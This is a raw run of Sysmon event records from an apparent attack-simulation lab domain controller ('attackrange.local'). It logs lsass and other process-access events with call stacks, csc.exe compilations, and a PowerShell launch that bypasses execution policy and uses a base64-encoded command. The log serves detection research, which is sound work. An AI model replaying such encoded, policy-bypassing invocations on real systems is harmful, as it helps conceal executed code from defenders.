15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7C3F-5FA1-0603-000000008701}50003960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7C3F-5FA1-0703-000000008701}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.709{D28789B6-7C3F-5FA1-0703-000000008701}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESE9EA.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCC16F4CB1CEB04654AAF1CFF14491A890.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7C3F-5FA1-0603-000000008701}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\01fhxppq.cmdline" 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3F-5FA1-0603-000000008701}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3F-5FA1-0603-000000008701}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7C3E-5FA1-0403-000000008701}50124960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3F-5FA1-0603-000000008701}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF83B0ABAAF) 154100x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.620{D28789B6-7C3F-5FA1-0603-000000008701}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\01fhxppq.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.607{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\01fhxppq.cmdline2020-11-03 15:50:23.607 11241100x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:50:23.607{D28789B6-7C3E-5FA1-0403-000000008701}5012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\01fhxppq.dll2020-11-03 15:50:23.607 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3F-5FA1-0503-000000008701}4068C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.122{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.